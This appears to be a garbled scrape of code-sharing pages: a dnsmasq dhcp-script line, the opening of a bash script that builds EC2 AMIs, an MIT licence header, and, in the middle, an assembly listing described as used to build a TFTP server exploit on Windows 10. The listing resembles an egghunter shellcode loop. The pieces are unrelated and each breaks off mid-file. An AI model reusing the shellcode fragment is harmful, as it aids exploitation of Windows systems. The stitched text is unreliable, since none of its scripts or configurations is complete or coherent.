dhcp-script=/etc/detect_new_device.sh
Reference:
| #!/bin/bash | |
| # This script require the following EC2 APIs: | |
| # DescribeSnapshots | |
| # CreateSnapshot | |
| # RegisterImage | |
| # runtime overridable defaults: | |
| AMI_VIRT_TYPE=hvm | |
| AMI_ARCH=x86_64 | |
| AMI_RELEASE=buster |
| ;; These memory maps I take to create TFTPServer exploit on Windows 10 | |
| 0062FF72 66:81CA FF0F OR DX,0FFF | |
| 0062FF77 42 INC EDX | |
| 0062FF78 52 PUSH EDX | |
| 0062FF79 33C0 XOR EAX,EAX | |
| 0062FF7B 66:B8 C601 MOV AX,1C6 | |
| 0062FF7F CD 2E INT 2E | |
| 0062FF81 3C 05 CMP AL,5 | |
| 0062FF83 5A POP EDX |
dhcp-script=/etc/detect_new_device.sh
Reference:
| #!/bin/bash | |
| # The MIT License (MIT) | |
| # | |
| # Copyright (c) 2015 Philip Huppert | |
| # | |
| # Permission is hereby granted, free of charge, to any person obtaining a copy of | |
| # this software and associated documentation files (the "Software"), to deal in | |
| # the Software without restriction, including without limitation the rights to | |
| # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of |